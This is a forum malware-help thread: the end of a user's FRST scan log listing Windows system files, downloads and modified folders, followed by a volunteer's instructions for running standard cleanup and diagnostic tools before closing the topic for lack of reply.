2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:38 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-03-09 10:22 - 2016-02-11 14:38 - 00171520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-03-09 10:22 - 2016-02-11 14:38 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-03-09 10:22 - 2016-02-11 14:38 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-03-09 10:22 - 2016-02-11 14:38 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-03-09 10:22 - 2016-02-11 14:37 - 00251392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-03-09 10:22 - 2016-02-11 14:37 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-03-09 10:22 - 2016-02-11 14:37 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-03-09 10:22 - 2016-02-11 14:35 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-03-09 10:22 - 2016-02-11 14:35 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-03-09 10:22 - 2016-02-11 14:35 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-03-09 10:22 - 2016-02-11 14:34 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-03-09 10:22 - 2016-02-11 14:31 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 13:48 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-03-09 10:22 - 2016-02-11 13:43 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-03-09 10:22 - 2016-02-11 13:41 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-03-09 10:22 - 2016-02-11 13:40 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-03-09 10:22 - 2016-02-11 13:34 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-03-09 10:22 - 2016-02-11 13:33 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-03-09 10:22 - 2016-02-11 13:32 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-03-09 10:22 - 2016-02-11 13:32 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-03-09 10:22 - 2016-02-11 13:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-03-09 10:22 - 2016-02-11 13:32 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-03-09 10:22 - 2016-02-11 13:32 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-03-09 10:22 - 2016-02-11 13:31 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-03-09 10:22 - 2016-02-11 13:30 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 13:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 13:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 13:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-03-09 10:20 - 2016-02-09 05:57 - 14634496 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-03-09 10:20 - 2016-02-09 05:57 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2016-03-09 10:20 - 2016-02-09 05:56 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2016-03-09 10:20 - 2016-02-09 05:56 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2016-03-09 10:20 - 2016-02-09 05:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\seclogon.dll
2016-03-09 10:20 - 2016-02-09 05:54 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2016-03-09 10:20 - 2016-02-09 05:51 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2016-03-09 10:20 - 2016-02-09 05:51 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-03-09 10:20 - 2016-02-09 05:13 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2016-03-09 10:20 - 2016-02-09 05:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2016-03-09 10:20 - 2016-02-09 05:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2016-03-09 10:20 - 2016-02-05 14:54 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-03-09 10:20 - 2016-02-05 14:54 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2016-03-09 10:20 - 2016-02-05 14:53 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-03-09 10:20 - 2016-02-05 14:53 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2016-03-09 10:20 - 2016-02-05 14:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2016-03-09 10:20 - 2016-02-05 14:44 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-03-09 10:20 - 2016-02-05 14:42 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2016-03-09 10:20 - 2016-02-05 13:48 - 00372736 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-03-09 10:20 - 2016-02-05 13:43 - 00299520 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-03-09 10:20 - 2016-02-05 13:43 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-03-09 10:20 - 2016-02-04 21:19 - 00381440 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2016-03-09 10:20 - 2016-02-04 14:41 - 00296448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2016-03-09 10:18 - 2016-02-19 15:02 - 00038336 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-03-09 10:18 - 2016-02-19 14:54 - 01168896 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-03-09 10:18 - 2016-02-19 10:07 - 01373184 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-03-09 10:18 - 2016-02-11 10:07 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-03-09 10:18 - 2016-02-05 10:07 - 00696832 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-03-09 10:18 - 2016-02-05 10:07 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-03-09 10:18 - 2016-02-05 10:07 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-03-09 09:20 - 2016-03-09 09:20 - 00474598 _____ C:\Users\lks\Downloads\Tuesday  Data Sheet 03-08-16   .xlsx
2016-03-09 09:17 - 2016-03-09 09:17 - 00033280 _____ C:\Users\lks\Downloads\3-8-16 Kristen Tuesday Data .xls
2016-03-08 13:26 - 2016-03-08 13:26 - 00012612 _____ C:\Users\lks\Downloads\Data sheet (1).xlsx
2016-03-08 13:25 - 2016-03-08 13:25 - 00012612 _____ C:\Users\lks\Downloads\Data sheet.xlsx
2016-03-08 09:36 - 2016-03-08 09:36 - 00475489 _____ C:\Users\lks\Downloads\Monday Data Sheet 03-07-16    .xlsx
2016-03-08 09:35 - 2016-03-08 09:35 - 00016303 _____ C:\Users\lks\Downloads\3-7-16 Kristen Monday Data Sheet .xlsx
2016-03-07 17:31 - 2016-03-07 17:31 - 06248500 _____ C:\Users\lks\Downloads\Southern New England walk Flyer 2016.pdf
2016-03-07 17:30 - 2016-03-07 17:30 - 06248500 _____ C:\Users\lks\Downloads\Southern New England walk Flyer-reduced.pdf
2016-03-07 13:39 - 2016-03-07 13:39 - 00077102 _____ C:\Users\lks\Downloads\PR invoice #2278.pdf
2016-03-07 11:21 - 2016-03-07 11:21 - 00014304 _____ C:\Users\lks\Downloads\3-4-16 Kristen Friday Data Sheet .xlsx
2016-03-07 11:16 - 2016-03-07 11:16 - 00590515 _____ C:\Users\lks\Downloads\Attachments_201637.zip
2016-03-07 11:13 - 2016-03-07 11:13 - 00476466 _____ C:\Users\lks\Downloads\Thursday Data Sheet 03-03-16   .xlsx
2016-03-07 11:13 - 2016-03-07 11:13 - 00115609 _____ C:\Users\lks\Downloads\Luciana L3.jpeg
2016-03-07 11:13 - 2016-03-07 11:13 - 00115609 _____ C:\Users\lks\Downloads\Luciana L3 (1).jpeg
2016-03-07 11:12 - 2016-03-07 11:12 - 00017576 _____ C:\Users\lks\Downloads\3-3-16 Kristen Thursday Data Sheet .xlsx
2016-03-07 11:03 - 2016-03-07 11:03 - 00029184 _____ C:\Users\lks\Downloads\Assignment Sheet -Demovick
2016-03-07 11:03 - 2016-03-07 11:03 - 00015304 _____ C:\Users\lks\Downloads\3-2-16 Wednesday Data Sheet .xlsx
2016-03-07 10:24 - 2016-03-07 10:24 - 00313592 _____ C:\Users\lks\Desktop\K. Rood BCI.pdf
2016-03-07 10:21 - 2016-03-07 10:21 - 00032768 _____ C:\Users\lks\Downloads\3-1-16 Kristen Tuesday Data.xls
2016-03-07 10:20 - 2016-03-07 10:21 - 00479010 _____ C:\Users\lks\Downloads\Wednesday Data Sheet 02-24-16    .xlsx
2016-03-07 10:20 - 2016-03-07 10:20 - 00476479 _____ C:\Users\lks\Downloads\Thursday Data Sheet 02-25-16   .xlsx
2016-03-07 10:20 - 2016-03-07 10:20 - 00475506 _____ C:\Users\lks\Downloads\Monday Data Sheet 02-29-16   .xlsx
2016-03-07 10:15 - 2016-03-07 10:16 - 00016249 _____ C:\Users\lks\Downloads\2-29-16 Kristen Monday Data Sheet.xlsx
2016-03-03 12:41 - 2016-03-03 12:41 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-03 12:16 - 2016-03-03 12:16 - 00000000 ____D C:\ProgramData\Panda Security
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-30 08:28 - 2010-02-06 15:44 - 00000000 ____D C:\temp
2016-03-30 08:07 - 2012-09-24 15:21 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-30 08:07 - 2009-07-14 00:45 - 00018736 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-03-30 08:07 - 2009-07-14 00:45 - 00018736 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-03-30 08:01 - 2012-05-18 13:25 - 00000252 _____ C:\Windows\Tasks\HP Photo Creations Messager.job
2016-03-30 07:55 - 2012-09-24 15:21 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-30 07:54 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-03-30 07:54 - 2009-07-14 00:45 - 00511920 _____ C:\Windows\system32\FNTCACHE.DAT
2016-03-29 16:27 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\system32\NDF
2016-03-29 13:12 - 2012-02-10 13:32 - 00000000 ____D C:\Users\lks\Documents\Outlook Files
2016-03-28 22:53 - 2013-03-20 10:45 - 00000000 ____D C:\ProgramData\BrOwwsae2saevEe
2016-03-28 18:31 - 2010-02-05 16:05 - 00000000 ____D C:\Users\lks\AppData\Local\VirtualStore
2016-03-28 17:54 - 2010-02-05 16:05 - 00123368 _____ C:\Users\lks\AppData\Local\GDIPFONTCACHEV1.DAT
2016-03-25 12:03 - 2015-06-01 10:49 - 00000000 ____D C:\Users\lks\Documents\Invoices to file
2016-03-25 08:50 - 2016-02-12 13:57 - 00037888 _____ C:\Users\lks\Documents\Jackson Ford Winter 2016.xls
2016-03-25 08:49 - 2015-06-01 10:49 - 00000000 ____D C:\Users\lks\Documents\Client Files (File)
2016-03-24 14:56 - 2010-02-06 14:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2016-03-24 14:55 - 2009-07-14 03:45 - 00000000 ____D C:\Windows\ShellNew
2016-03-24 14:50 - 2009-07-13 22:34 - 00000534 _____ C:\Windows\win.ini
2016-03-24 13:06 - 2016-01-27 15:49 - 00000000 ____D C:\Users\lks\Documents\Conference Material
2016-03-24 13:06 - 2015-10-05 16:21 - 00000000 ____D C:\Users\lks\Documents\Custom Office Templates
2016-03-24 13:06 - 2015-09-29 14:03 - 00000000 ____D C:\Users\lks\Documents\Berklee
2016-03-24 13:06 - 2014-10-27 10:58 - 00000000 ____D C:\Users\lks\Documents\Task Force
2016-03-24 13:06 - 2014-10-01 13:49 - 00000000 ____D C:\Users\lks\Documents\Contact List Clients
2016-03-24 13:06 - 2014-08-12 09:02 - 00000000 ____D C:\Users\lks\Documents\Contracts 2014
2016-03-24 13:06 - 2013-02-04 13:58 - 00000000 ____D C:\Users\lks\Documents\Avery Templates
2016-03-24 11:52 - 2010-02-08 15:55 - 00000000 ____D C:\Users\lks\AppData\LocalLow\HPAppData
2016-03-24 11:44 - 2014-10-06 08:39 - 00000000 ___RD C:\Users\lks\Documents\Client Files
2016-03-24 11:33 - 2010-02-05 16:00 - 00000000 ____D C:\Users\lks
2016-03-24 09:39 - 2011-11-22 14:27 - 00000000 ____D C:\Users\lks\AppData\Local\CrashDumps
2016-03-23 15:36 - 2009-07-14 01:13 - 00855656 _____ C:\Windows\system32\PerfStringBackup.INI
2016-03-23 15:36 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf
2016-03-23 12:23 - 2015-02-04 14:55 - 00000000 ____D C:\Users\lks\Documents\Employees
2016-03-21 14:54 - 2012-02-10 12:42 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-21 14:48 - 2013-08-14 13:07 - 00000000 ____D C:\Windows\system32\MRT
2016-03-21 14:43 - 2012-10-31 15:40 - 00123368 _____ C:\Users\Guest\AppData\Local\GDIPFONTCACHEV1.DAT
2016-03-21 14:41 - 2012-10-31 15:40 - 00001415 _____ C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-03-21 14:41 - 2012-10-31 15:40 - 00000000 ____D C:\Users\Guest\AppData\Local\Google
2016-03-21 13:32 - 2011-10-28 10:52 - 00000000 ____D C:\Users\lks\AppData\Roaming\Apple Computer
2016-03-21 13:32 - 2010-11-03 15:18 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-03-21 13:04 - 2009-12-02 05:16 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-03-21 12:57 - 2013-01-24 18:29 - 00000000 ____D C:\Users\QBDataServiceUser22
2016-03-21 12:54 - 2011-11-22 11:58 - 00002073 _____ C:\Users\Public\Desktop\QuickBooks Pro 2012.lnk
2016-03-21 12:54 - 2011-11-22 11:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickBooks
2016-03-21 12:54 - 2011-11-22 11:56 - 00000089 _____ C:\Windows\QBChanUtil_Trigger.ini
2016-03-15 15:56 - 2015-04-08 11:53 - 587220018 _____ C:\Windows\MEMORY.DMP
2016-03-15 15:56 - 2015-04-08 11:53 - 00000000 ____D C:\Windows\Minidump
2016-03-15 09:39 - 2013-08-07 15:07 - 00002157 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-15 09:39 - 2013-08-07 15:07 - 00002145 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-15 09:23 - 2015-02-02 10:27 - 00000000 ____D C:\Users\lks\Documents\Bradley Hospital
2016-03-14 12:09 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2016-03-11 10:51 - 2015-02-11 09:38 - 00000000 ____D C:\Users\lks\Documents\HANDS IN HARMONY FAQ PDF
2016-03-09 17:10 - 2016-01-25 10:11 - 00000000 ____D C:\Users\lks\AppData\Local\Agtworks
2016-03-09 16:57 - 2010-10-21 16:11 - 143659408 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-03-09 16:56 - 2014-12-11 09:09 - 00000000 ____D C:\Windows\system32\appraiser
2016-03-08 09:30 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\security
2016-03-07 15:49 - 2014-12-22 10:03 - 00000000 ____D C:\Users\lks\AppData\Roaming\DigitalSites
2016-03-07 15:49 - 2014-10-16 10:59 - 00000000 ____D C:\ProgramData\APN
2016-03-07 10:59 - 2015-06-17 09:48 - 00000000 ____D C:\Users\lks\AppData\Local\Dropbox
2016-03-03 14:11 - 2010-10-29 12:31 - 00000000 ____D C:\Program Files (x86)\VERIZONDM
2016-03-03 14:05 - 2012-06-04 15:45 - 00000000 ____D C:\Users\lks\AppData\Roaming\Dropbox
2016-03-03 14:05 - 2010-04-02 15:36 - 00000000 ____D C:\Program Files (x86)\Verizon
2016-03-03 14:04 - 2012-06-04 15:47 - 00000000 ___RD C:\Users\lks\Dropbox
2016-03-03 13:23 - 2013-03-20 10:37 - 00000000 ____D C:\ProgramData\Wincert
 
==================== Files in the root of some directories =======
 
2014-10-15 10:00 - 2014-10-15 10:00 - 0038439 _____ () C:\Users\lks\AppData\Roaming\Comma Separated Values (Windows).ADR
2013-01-24 17:11 - 2013-01-24 17:57 - 0032483 _____ () C:\Users\lks\AppData\Roaming\FileDiagTool.log
2012-09-26 11:20 - 2012-09-26 11:25 - 0022588 _____ () C:\Users\lks\AppData\Roaming\Microsoft Excel 97-2003.ADR
2013-01-02 13:56 - 2013-01-02 13:56 - 0033134 _____ () C:\Users\lks\AppData\Roaming\UserTile.png
2014-12-22 11:03 - 2016-02-17 10:58 - 0000202 _____ () C:\Users\lks\AppData\Roaming\WB.CFG
2016-03-24 13:09 - 2016-03-24 13:09 - 0000124 _____ () C:\Users\lks\AppData\Roaming\wklnhst.dat
2016-03-24 13:03 - 2016-03-28 21:15 - 0007633 _____ () C:\Users\lks\AppData\Local\Resmon.ResmonCfg
2012-05-18 13:23 - 2012-05-18 13:23 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-02-06 15:33 - 2014-04-06 15:15 - 0004003 _____ () C:\ProgramData\hpzinstall.log
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-03-29 00:40
 
==================== End of FRST.txt ============================

Attached Files



BC AdBot (Login to Remove)

 


#2 Jo*

Jo*

  • Malware Response Team
  • 3,400 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:37 AM

Posted 30 March 2016 - 08:35 AM

:welcome: to BleepingComputer.

Hi there,

my name is Jo and I will help you with your computer problems.


Please follow these guidelines:
  • Read and follow the instructions in the sequence they are posted.
  • print or copy & save instructions.
  • back up all your private data / music / important files on another (external) drive before using our tools.
  • Do not install / uninstall any applications, unless otherwise instructed.
  • Use only that tools you have been instructed to use.
  • Copy and Paste the log files inside your post, unless otherwise instructed.
  • Ask for clarification, if you have any questions.
  • Stay with this topic til you get the all clean post.
  • My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

***


:step1: Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
    Vista / Windows 7/8 users right-click and select Run As Administrator.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

***


:step2: Please download Malwarebytes Anti-Rootkit and save it to your desktop.
  • Be sure to print out and follow the instructions provided on that same page.
  • Caution: This is a beta version so please be sure to read the disclaimer and back up all your data before using.
  • Double click on downloaded file. OK self extracting prompt.
  • MBAR will start. Click in the introduction screen "next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
With some infections, you may see two messages boxes.
  • 'Could not load protection driver'. Click 'OK'.
  • 'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.
  • If malware is found - do not press the Clean up button, please go to the MBAR folder and then copy/paste the contents of the MBAR-log-***.txt file to your next reply.
  • If there is no malware found, please let me know as well.

***


:step3: Please download AdwCleaner by Xplode and save to your Desktop.
Double-click AdwCleaner.exe
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
    The actual line should say "Pending. Please uncheck elements you do not want to remove" => scan is complete.
  • After the scan has finished, click on the Logfile button...a logfile (AdwCleaner[R0].txt) will open in Notepad for review.
  • The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it.
    If you see an entry you want to keep, let me know about it.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.

***


:step4: MiniToolbox by Farbar

Disable your antivirus if it does not allow you to download the tool!
Please download MiniToolBox, save it to your desktop and run it.
Place a checkmark in Select all, then click Go and post the result (MTB.txt). A copy of Result.txt will be saved in the same directory the tool is run.
Copy and paste the contents of that logfile in your next reply.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#3 Jo*

Jo*

  • Malware Response Team
  • 3,400 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:37 AM

Posted 01 April 2016 - 09:19 AM


Hi,

it has been several days since I sent my last set of instructions to help with your computer problem.

Please let me know if you are having problems and still need help.

Note: Threads will be closed if no response after 3 days.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#4 Jo*

Jo*

  • Malware Response Team
  • 3,400 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:37 AM

Posted 04 April 2016 - 05:17 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users